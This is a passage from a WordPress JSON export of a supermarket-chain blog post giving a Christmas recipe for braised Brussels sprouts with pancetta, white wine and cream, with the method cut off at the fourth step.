{"id":14200,"date":"2020-11-12T16:29:29","date_gmt":"2020-11-12T09:29:29","guid":{"rendered":"https:\/\/corporate.tops.co.th\/?p=14200\/"},"modified":"2020-11-12T16:29:29","modified_gmt":"2020-11-12T09:29:29","slug":"brussels-sprout","status":"publish","type":"post","link":"https:\/\/corporate.tops.co.th\/th\/uncategorized-th\/brussels-sprout\/","title":{"rendered":"Brussels Sprout"},"content":{"rendered":"<p><u>BRUSSELS SPROUT<\/u><\/p>\n<p>Bring Brussels sprout to life with delicious recipe for a perfect Christmas side dish!<\/p>\n<p><strong><u>Braised Sprouts with Pancetta and Cream<\/u><\/strong><\/p>\n<p><strong>Servings: <\/strong>6, as a side<\/p>\n<p><strong>Preparation: <\/strong>5 minutes<\/p>\n<p><strong>Cooking: <\/strong>20 minutes<\/p>\n<p><strong>Ingredients:<\/strong><\/p>\n<ul>\n<li>150 g. of smoked pancetta or bacon, cut into strips<\/li>\n<li>2 tbsp. olive oil<\/li>\n<li>1 finely chopped onion<\/li>\n<li>2 crushed garlic cloves<\/li>\n<li>150 ml. dry white wine<\/li>\n<li>400 g. of trimmed and shredded Brussels sprouts<\/li>\n<li>150 ml. double cream<\/li>\n<li>A pinch of freshly grated nutmeg<\/li>\n<\/ul>\n<p><strong>\u00a0How to cook:\u00a0<\/strong><\/p>\n<ol>\n<li>Cook the pancetta or bacon in a heavy-based saucepan without oil until the fat starts to release and the meat starts to brown.<\/li>\n<li>Add oil, onion, garlic and a pinch of salt. Soften over gentle heat for 5-6 minutes.<\/li>\n<li>Add wine, turn up the heat then reduce again by about two-thirds until syrupy.<\/li>\n<li>Add the sprouts and 3 tbsp. of water.
